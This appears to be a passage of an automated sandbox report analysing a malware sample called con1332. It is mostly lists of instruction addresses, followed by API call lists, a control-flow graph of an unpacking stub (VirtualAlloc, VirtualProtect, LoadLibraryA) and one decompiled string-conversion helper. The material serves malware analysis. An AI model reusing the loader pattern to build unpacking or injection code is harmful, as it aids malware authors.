                                                                                                                                                                                                                                    0x00401f22
                                                                                                                                                                                                                                    0x00401f24
                                                                                                                                                                                                                                    0x00401f28
                                                                                                                                                                                                                                    0x00401f2f
                                                                                                                                                                                                                                    0x00401f33
                                                                                                                                                                                                                                    0x00401f33
                                                                                                                                                                                                                                    0x00401f40
                                                                                                                                                                                                                                    0x00401f45
                                                                                                                                                                                                                                    0x00401f4a
                                                                                                                                                                                                                                    0x00401f4b
                                                                                                                                                                                                                                    0x00401f50
                                                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                                                    0x00401f58
                                                                                                                                                                                                                                    0x00401f33
                                                                                                                                                                                                                                    0x00401f63
                                                                                                                                                                                                                                    0x00401f63
                                                                                                                                                                                                                                    0x00401f69
                                                                                                                                                                                                                                    0x00401f72
                                                                                                                                                                                                                                    0x00401f72
                                                                                                                                                                                                                                    0x00401f72
                                                                                                                                                                                                                                    0x00401f73
                                                                                                                                                                                                                                    0x00401f75
                                                                                                                                                                                                                                    0x00401f7b
                                                                                                                                                                                                                                    0x00401f80
                                                                                                                                                                                                                                    0x00401f81
                                                                                                                                                                                                                                    0x00401f86
                                                                                                                                                                                                                                    0x00401f86
                                                                                                                                                                                                                                    0x00401f8c
                                                                                                                                                                                                                                    0x00401f8d
                                                                                                                                                                                                                                    0x00401f8d
                                                                                                                                                                                                                                    0x00401f9d
                                                                                                                                                                                                                                    0x00401fa2
                                                                                                                                                                                                                                    0x00401fa6
                                                                                                                                                                                                                                    0x00401fac
                                                                                                                                                                                                                                    0x00401faf
                                                                                                                                                                                                                                    0x00401fb6
                                                                                                                                                                                                                                    0x00401fbf
                                                                                                                                                                                                                                    0x00401fc4
                                                                                                                                                                                                                                    0x00401fc8
                                                                                                                                                                                                                                    0x00401fce
                                                                                                                                                                                                                                    0x00401fd3
                                                                                                                                                                                                                                    0x00401fe0
                                                                                                                                                                                                                                    0x00401fec
                                                                                                                                                                                                                                    0x00401ffe
                                                                                                                                                                                                                                    0x00402001
                                                                                                                                                                                                                                    0x00402006
                                                                                                                                                                                                                                    0x0040200b
                                                                                                                                                                                                                                    0x00402010
                                                                                                                                                                                                                                    0x00402015
                                                                                                                                                                                                                                    0x0040201a
                                                                                                                                                                                                                                    0x0040201f
                                                                                                                                                                                                                                    0x00402024
                                                                                                                                                                                                                                    0x00402029
                                                                                                                                                                                                                                    0x0040202e
                                                                                                                                                                                                                                    0x00402033
                                                                                                                                                                                                                                    0x00402038
                                                                                                                                                                                                                                    0x0040203d
                                                                                                                                                                                                                                    0x00402042
                                                                                                                                                                                                                                    0x00402047
                                                                                                                                                                                                                                    0x0040204c
                                                                                                                                                                                                                                    0x00402051
                                                                                                                                                                                                                                    0x00402056
                                                                                                                                                                                                                                    0x0040205b
                                                                                                                                                                                                                                    0x00402060
                                                                                                                                                                                                                                    0x00402065
                                                                                                                                                                                                                                    0x0040206a
                                                                                                                                                                                                                                    0x0040206f
                                                                                                                                                                                                                                    0x00402074
                                                                                                                                                                                                                                    0x00402079
                                                                                                                                                                                                                                    0x0040207e
                                                                                                                                                                                                                                    0x00402083
                                                                                                                                                                                                                                    0x00402088
                                                                                                                                                                                                                                    0x0040208d
                                                                                                                                                                                                                                    0x00402092
                                                                                                                                                                                                                                    0x00402097
                                                                                                                                                                                                                                    0x0040209c
                                                                                                                                                                                                                                    0x004020a1
                                                                                                                                                                                                                                    0x004020a5
                                                                                                                                                                                                                                    0x004020aa
                                                                                                                                                                                                                                    0x004020ae
                                                                                                                                                                                                                                    0x004020b4
                                                                                                                                                                                                                                    0x004020b6
                                                                                                                                                                                                                                    0x004020bb
                                                                                                                                                                                                                                    0x004020c0
                                                                                                                                                                                                                                    0x004020c5
                                                                                                                                                                                                                                    0x004020ca
                                                                                                                                                                                                                                    0x004020cf
                                                                                                                                                                                                                                    0x004020d4
                                                                                                                                                                                                                                    0x004020e1
                                                                                                                                                                                                                                    0x004020e6
                                                                                                                                                                                                                                    0x004020eb
                                                                                                                                                                                                                                    0x004020f0
                                                                                                                                                                                                                                    0x004020f5
                                                                                                                                                                                                                                    0x004020fa
                                                                                                                                                                                                                                    0x004020ff
                                                                                                                                                                                                                                    0x00402104
                                                                                                                                                                                                                                    0x00402109
                                                                                                                                                                                                                                    0x0040210e
                                                                                                                                                                                                                                    0x00402113
                                                                                                                                                                                                                                    0x00402118
                                                                                                                                                                                                                                    0x0040211d
                                                                                                                                                                                                                                    0x00402122
                                                                                                                                                                                                                                    0x00402127
                                                                                                                                                                                                                                    0x0040212c
                                                                                                                                                                                                                                    0x00402131
                                                                                                                                                                                                                                    0x00402136
                                                                                                                                                                                                                                    0x0040213b
                                                                                                                                                                                                                                    0x00402140
                                                                                                                                                                                                                                    0x00402145
                                                                                                                                                                                                                                    0x0040214a
                                                                                                                                                                                                                                    0x0040214f
                                                                                                                                                                                                                                    0x00402154
                                                                                                                                                                                                                                    0x00402159
                                                                                                                                                                                                                                    0x0040215e
                                                                                                                                                                                                                                    0x00402163
                                                                                                                                                                                                                                    0x00402167
                                                                                                                                                                                                                                    0x0040216c
                                                                                                                                                                                                                                    0x00402171
                                                                                                                                                                                                                                    0x00402177
                                                                                                                                                                                                                                    0x00402179
                                                                                                                                                                                                                                    0x0040217c
                                                                                                                                                                                                                                    0x0040217e
                                                                                                                                                                                                                                    0x00402183
                                                                                                                                                                                                                                    0x00402188
                                                                                                                                                                                                                                    0x0040218f
                                                                                                                                                                                                                                    0x00402196
                                                                                                                                                                                                                                    0x0040219a
                                                                                                                                                                                                                                    0x0040219e
                                                                                                                                                                                                                                    0x004021a2
                                                                                                                                                                                                                                    0x004021a4
                                                                                                                                                                                                                                    0x004021bc
                                                                                                                                                                                                                                    0x004021be
                                                                                                                                                                                                                                    0x004021c0
                                                                                                                                                                                                                                    0x004021c6
                                                                                                                                                                                                                                    0x004021ca
                                                                                                                                                                                                                                    0x004021e5
                                                                                                                                                                                                                                    0x004021ec
                                                                                                                                                                                                                                    0x004021f1
                                                                                                                                                                                                                                    0x00402213
                                                                                                                                                                                                                                    0x00402215
                                                                                                                                                                                                                                    0x00402217
                                                                                                                                                                                                                                    0x0040221d
                                                                                                                                                                                                                                    0x00402239
                                                                                                                                                                                                                                    0x0040223b
                                                                                                                                                                                                                                    0x0040223d
                                                                                                                                                                                                                                    0x00402243
                                                                                                                                                                                                                                    0x0040224d
                                                                                                                                                                                                                                    0x0040224f
                                                                                                                                                                                                                                    0x00402251
                                                                                                                                                                                                                                    0x00402260
                                                                                                                                                                                                                                    0x00402264
                                                                                                                                                                                                                                    0x00402269
                                                                                                                                                                                                                                    0x00402277
                                                                                                                                                                                                                                    0x0040227b
                                                                                                                                                                                                                                    0x00402286
                                                                                                                                                                                                                                    0x00402293
                                                                                                                                                                                                                                    0x004022af
                                                                                                                                                                                                                                    0x004022b1
                                                                                                                                                                                                                                    0x004022b5
                                                                                                                                                                                                                                    0x004022b7
                                                                                                                                                                                                                                    0x004022be
                                                                                                                                                                                                                                    0x004022be
                                                                                                                                                                                                                                    0x004022d7
                                                                                                                                                                                                                                    0x004022e8
                                                                                                                                                                                                                                    0x004022ef
                                                                                                                                                                                                                                    0x004022f6
                                                                                                                                                                                                                                    0x00402300
                                                                                                                                                                                                                                    0x00402304
                                                                                                                                                                                                                                    0x00402308
                                                                                                                                                                                                                                    0x00402315
                                                                                                                                                                                                                                    0x0040231a
                                                                                                                                                                                                                                    0x0040231e
                                                                                                                                                                                                                                    0x00402324
                                                                                                                                                                                                                                    0x00402328
                                                                                                                                                                                                                                    0x0040232a
                                                                                                                                                                                                                                    0x00402331
                                                                                                                                                                                                                                    0x00402331
                                                                                                                                                                                                                                    0x0040234e
                                                                                                                                                                                                                                    0x00402350
                                                                                                                                                                                                                                    0x00402352
                                                                                                                                                                                                                                    0x00402355
                                                                                                                                                                                                                                    0x00402355
                                                                                                                                                                                                                                    0x0040235b
                                                                                                                                                                                                                                    0x0040235f
                                                                                                                                                                                                                                    0x00402361
                                                                                                                                                                                                                                    0x00402368
                                                                                                                                                                                                                                    0x00402368
                                                                                                                                                                                                                                    0x0040236d
                                                                                                                                                                                                                                    0x00402371
                                                                                                                                                                                                                                    0x00402373
                                                                                                                                                                                                                                    0x00402375
                                                                                                                                                                                                                                    0x0040237b
                                                                                                                                                                                                                                    0x0040237b
                                                                                                                                                                                                                                    0x00402377
                                                                                                                                                                                                                                    0x00402377
                                                                                                                                                                                                                                    0x00402377
                                                                                                                                                                                                                                    0x00402390
                                                                                                                                                                                                                                    0x00402396
                                                                                                                                                                                                                                    0x0040239c
                                                                                                                                                                                                                                    0x004023a0
                                                                                                                                                                                                                                    0x004023a2
                                                                                                                                                                                                                                    0x004023a9
                                                                                                                                                                                                                                    0x004023a9
                                                                                                                                                                                                                                    0x004023ae
                                                                                                                                                                                                                                    0x004023b2
                                                                                                                                                                                                                                    0x004023b4
                                                                                                                                                                                                                                    0x004023ba
                                                                                                                                                                                                                                    0x004023ba
                                                                                                                                                                                                                                    0x004023b6
                                                                                                                                                                                                                                    0x004023b6
                                                                                                                                                                                                                                    0x004023b6
                                                                                                                                                                                                                                    0x004023ce
                                                                                                                                                                                                                                    0x004023d1
                                                                                                                                                                                                                                    0x004023d3
                                                                                                                                                                                                                                    0x004023dd
                                                                                                                                                                                                                                    0x004023ec
                                                                                                                                                                                                                                    0x004023ef
                                                                                                                                                                                                                                    0x004023fe
                                                                                                                                                                                                                                    0x00402401
                                                                                                                                                                                                                                    0x00402403
                                                                                                                                                                                                                                    0x00402411
                                                                                                                                                                                                                                    0x00402417
                                                                                                                                                                                                                                    0x00402424
                                                                                                                                                                                                                                    0x00402426
                                                                                                                                                                                                                                    0x0040242a
                                                                                                                                                                                                                                    0x0040242c
                                                                                                                                                                                                                                    0x00402434
                                                                                                                                                                                                                                    0x00402434
                                                                                                                                                                                                                                    0x0040243a
                                                                                                                                                                                                                                    0x0040243f
                                                                                                                                                                                                                                    0x00402443
                                                                                                                                                                                                                                    0x00402445
                                                                                                                                                                                                                                    0x0040244d
                                                                                                                                                                                                                                    0x0040244d
                                                                                                                                                                                                                                    0x00402445
                                                                                                                                                                                                                                    0x00402251
                                                                                                                                                                                                                                    0x0040223d
                                                                                                                                                                                                                                    0x0040244f
                                                                                                                                                                                                                                    0x0040245d
                                                                                                                                                                                                                                    0x0040245f
                                                                                                                                                                                                                                    0x00402461
                                                                                                                                                                                                                                    0x00402462
                                                                                                                                                                                                                                    0x00402467
                                                                                                                                                                                                                                    0x00402467
                                                                                                                                                                                                                                    0x0040245f
                                                                                                                                                                                                                                    0x004021ca
                                                                                                                                                                                                                                    0x0040246a
                                                                                                                                                                                                                                    0x0040246e
                                                                                                                                                                                                                                    0x00402470
                                                                                                                                                                                                                                    0x00402478
                                                                                                                                                                                                                                    0x00402478
                                                                                                                                                                                                                                    0x0040247a
                                                                                                                                                                                                                                    0x0040247e
                                                                                                                                                                                                                                    0x00402480
                                                                                                                                                                                                                                    0x00402488
                                                                                                                                                                                                                                    0x00402488
                                                                                                                                                                                                                                    0x00402480
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c55
                                                                                                                                                                                                                                    0x00401c62
                                                                                                                                                                                                                                    0x00401c67
                                                                                                                                                                                                                                    0x00401c6a
                                                                                                                                                                                                                                    0x00401c6c
                                                                                                                                                                                                                                    0x00401c73
                                                                                                                                                                                                                                    0x00401c73
                                                                                                                                                                                                                                    0x00401c77
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c7b
                                                                                                                                                                                                                                    0x00401c8f
                                                                                                                                                                                                                                    0x00401c8f
                                                                                                                                                                                                                                    0x00401c7d
                                                                                                                                                                                                                                    0x00401c7d
                                                                                                                                                                                                                                    0x00401c83
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c85
                                                                                                                                                                                                                                    0x00401c85
                                                                                                                                                                                                                                    0x00401c88
                                                                                                                                                                                                                                    0x00401c8d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c8d
                                                                                                                                                                                                                                    0x00401c83
                                                                                                                                                                                                                                    0x00401c98
                                                                                                                                                                                                                                    0x00401c9a
                                                                                                                                                                                                                                    0x00401cbd
                                                                                                                                                                                                                                    0x00401cc2
                                                                                                                                                                                                                                    0x00401cc5
                                                                                                                                                                                                                                    0x00401cc7
                                                                                                                                                                                                                                    0x00401cd0
                                                                                                                                                                                                                                    0x00401cd0
                                                                                                                                                                                                                                    0x00401cd2
                                                                                                                                                                                                                                    0x00401cd4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401cd6
                                                                                                                                                                                                                                    0x00401cd8
                                                                                                                                                                                                                                    0x00401cec
                                                                                                                                                                                                                                    0x00401cec
                                                                                                                                                                                                                                    0x00401cda
                                                                                                                                                                                                                                    0x00401cda
                                                                                                                                                                                                                                    0x00401cdd
                                                                                                                                                                                                                                    0x00401ce0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401ce2
                                                                                                                                                                                                                                    0x00401ce2
                                                                                                                                                                                                                                    0x00401ce5
                                                                                                                                                                                                                                    0x00401ce8
                                                                                                                                                                                                                                    0x00401cea
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401cea
                                                                                                                                                                                                                                    0x00401ce0
                                                                                                                                                                                                                                    0x00401cf5
                                                                                                                                                                                                                                    0x00401cf5
                                                                                                                                                                                                                                    0x00401cf7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401cf9
                                                                                                                                                                                                                                    0x00401d02
                                                                                                                                                                                                                                    0x00401d07
                                                                                                                                                                                                                                    0x00401d09
                                                                                                                                                                                                                                    0x00401d10
                                                                                                                                                                                                                                    0x00401d1d
                                                                                                                                                                                                                                    0x00401d22
                                                                                                                                                                                                                                    0x00401d25
                                                                                                                                                                                                                                    0x00401d27
                                                                                                                                                                                                                                    0x00401d30
                                                                                                                                                                                                                                    0x00401d30
                                                                                                                                                                                                                                    0x00401d32
                                                                                                                                                                                                                                    0x00401d34
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d36
                                                                                                                                                                                                                                    0x00401d38
                                                                                                                                                                                                                                    0x00401d4c
                                                                                                                                                                                                                                    0x00401d4c
                                                                                                                                                                                                                                    0x00401d3a
                                                                                                                                                                                                                                    0x00401d3a
                                                                                                                                                                                                                                    0x00401d3d
                                                                                                                                                                                                                                    0x00401d40
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d42
                                                                                                                                                                                                                                    0x00401d42
                                                                                                                                                                                                                                    0x00401d45
                                                                                                                                                                                                                                    0x00401d48
                                                                                                                                                                                                                                    0x00401d4a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d4a
                                                                                                                                                                                                                                    0x00401d40
                                                                                                                                                                                                                                    0x00401d55
                                                                                                                                                                                                                                    0x00401d55
                                                                                                                                                                                                                                    0x00401d57
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d5d
                                                                                                                                                                                                                                    0x00401d6a
                                                                                                                                                                                                                                    0x00401d6f
                                                                                                                                                                                                                                    0x00401d72
                                                                                                                                                                                                                                    0x00401d74
                                                                                                                                                                                                                                    0x00401d80
                                                                                                                                                                                                                                    0x00401d80
                                                                                                                                                                                                                                    0x00401d82
                                                                                                                                                                                                                                    0x00401d84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d86
                                                                                                                                                                                                                                    0x00401d88
                                                                                                                                                                                                                                    0x00401d9c
                                                                                                                                                                                                                                    0x00401d9c
                                                                                                                                                                                                                                    0x00401d8a
                                                                                                                                                                                                                                    0x00401d8a
                                                                                                                                                                                                                                    0x00401d8d
                                                                                                                                                                                                                                    0x00401d90
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d92
                                                                                                                                                                                                                                    0x00401d92
                                                                                                                                                                                                                                    0x00401d95
                                                                                                                                                                                                                                    0x00401d98
                                                                                                                                                                                                                                    0x00401d9a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d9a
                                                                                                                                                                                                                                    0x00401d90
                                                                                                                                                                                                                                    0x00401da5
                                                                                                                                                                                                                                    0x00401da5
                                                                                                                                                                                                                                    0x00401da7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401da7
                                                                                                                                                                                                                                    0x00401da0
                                                                                                                                                                                                                                    0x00401da2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401da2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d57
                                                                                                                                                                                                                                    0x00401d50
                                                                                                                                                                                                                                    0x00401d52
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401dad
                                                                                                                                                                                                                                    0x00401db6
                                                                                                                                                                                                                                    0x00401dbb
                                                                                                                                                                                                                                    0x00401dbb
                                                                                                                                                                                                                                    0x00401d10
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d09
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401cf7
                                                                                                                                                                                                                                    0x00401cf0
                                                                                                                                                                                                                                    0x00401cf2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c9c
                                                                                                                                                                                                                                    0x00401c9c
                                                                                                                                                                                                                                    0x00401c9d
                                                                                                                                                                                                                                    0x00401caf
                                                                                                                                                                                                                                    0x00401caf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c9a
                                                                                                                                                                                                                                    0x00401c93
                                                                                                                                                                                                                                    0x00401c95
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c95
                                                                                                                                                                                                                                    0x00401c4f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                                                                                    • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                                                                                    • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                                                                                                                                                                                    • Module32Next.KERNEL32 ref: 00401D02
                                                                                                                                                                                                                                    • Module32Next.KERNEL32 ref: 00401DB6
                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                                                    • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPKs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                                                    • API String ID: 2366190142-892703413
                                                                                                                                                                                                                                    • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                                                                                                                                                                                    • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02BF003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 152 2bf003c-2bf0047 153 2bf004c-2bf0263 call 2bf0a3f call 2bf0e0f call 2bf0d90 VirtualAlloc 152->153 154 2bf0049 152->154 169 2bf028b-2bf0292 153->169 170 2bf0265-2bf0289 call 2bf0a69 153->170 154->153 172 2bf02a1-2bf02b0 169->172 174 2bf02ce-2bf03c2 VirtualProtect call 2bf0cce call 2bf0ce7 170->174 172->174 175 2bf02b2-2bf02cc 172->175 181 2bf03d1-2bf03e0 174->181 175->172 182 2bf0439-2bf04b8 VirtualFree 181->182 183 2bf03e2-2bf0437 call 2bf0ce7 181->183 185 2bf04be-2bf04cd 182->185 186 2bf05f4-2bf05fe 182->186 183->181 188 2bf04d3-2bf04dd 185->188 189 2bf077f-2bf0789 186->189 190 2bf0604-2bf060d 186->190 188->186 194 2bf04e3-2bf0505 LoadLibraryA 188->194 192 2bf078b-2bf07a3 189->192 193 2bf07a6-2bf07b0 189->193 190->189 195 2bf0613-2bf0637 190->195 192->193 196 2bf086e-2bf08be LoadLibraryA 193->196 197 2bf07b6-2bf07cb 193->197 198 2bf0517-2bf0520 194->198 199 2bf0507-2bf0515 194->199 200 2bf063e-2bf0648 195->200 204 2bf08c7-2bf08f9 196->204 201 2bf07d2-2bf07d5 197->201 202 2bf0526-2bf0547 198->202 199->202 200->189 203 2bf064e-2bf065a 200->203 205 2bf07d7-2bf07e0 201->205 206 2bf0824-2bf0833 201->206 207 2bf054d-2bf0550 202->207 203->189 208 2bf0660-2bf066a 203->208 210 2bf08fb-2bf0901 204->210 211 2bf0902-2bf091d 204->211 212 2bf07e4-2bf0822 205->212 213 2bf07e2 205->213 209 2bf0839-2bf083c 206->209 214 2bf0556-2bf056b 207->214 215 2bf05e0-2bf05ef 207->215 216 2bf067a-2bf0689 208->216 209->196 217 2bf083e-2bf0847 209->217 210->211 212->201 213->206 220 2bf056f-2bf057a 214->220 221 2bf056d 214->221 215->188 218 2bf068f-2bf06b2 216->218 219 2bf0750-2bf077a 216->219 224 2bf084b-2bf086c 217->224 225 2bf0849 217->225 226 2bf06ef-2bf06fc 218->226 227 2bf06b4-2bf06ed 218->227 219->200 222 2bf057c-2bf0599 220->222 223 2bf059b-2bf05bb 220->223 221->215 235 2bf05bd-2bf05db 222->235 223->235 224->209 225->196 229 2bf06fe-2bf0748 226->229 230 2bf074b 226->230 227->226 229->230 230->216 235->207
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02BF024D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                    • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                    • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                    • Instruction ID: c46072ac14fadc6c14f4da61cc6c098fcb884d1b5859fc903d461aa0a5fc68b9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B527E74A01229DFDBA4DF58C984BACBBB1BF09304F1484D9E54DA7366DB30AA85CF14
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 236 4018f0-4018fa 237 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 236->237 238 4018fc-401900 236->238 241 401940-401949 GetLastError 237->241 242 401996-40199a 237->242 243 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 241->243 244 40198d-40198f 241->244 243->244 244->242 246 401991 call 401030 244->246 246->242
                                                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                                                    			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}











                                                                                                                                                                                                                                    0x004018f0
                                                                                                                                                                                                                                    0x004018f2
                                                                                                                                                                                                                                    0x004018f6
                                                                                                                                                                                                                                    0x004018fa
                                                                                                                                                                                                                                    0x00401917
                                                                                                                                                                                                                                    0x0040191a
                                                                                                                                                                                                                                    0x0040192f
                                                                                                                                                                                                                                    0x00401939
                                                                                                                                                                                                                                    0x0040193b
                                                                                                                                                                                                                                    0x0040193e
                                                                                                                                                                                                                                    0x00401940
                                                                                                                                                                                                                                    0x00401949
                                                                                                                                                                                                                                    0x0040195e
                                                                                                                                                                                                                                    0x0040196b
                                                                                                                                                                                                                                    0x00401980
                                                                                                                                                                                                                                    0x0040198a
                                                                                                                                                                                                                                    0x0040198c
                                                                                                                                                                                                                                    0x0040198c
                                                                                                                                                                                                                                    0x0040198f
                                                                                                                                                                                                                                    0x00401991
                                                                                                                                                                                                                                    0x00401991
                                                                                                                                                                                                                                    0x0040198f
                                                                                                                                                                                                                                    0x0040199a
                                                                                                                                                                                                                                    0x004018fc
                                                                                                                                                                                                                                    0x004018fc
                                                                                                                                                                                                                                    0x00401900
                                                                                                                                                                                                                                    0x00401900

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 00401906
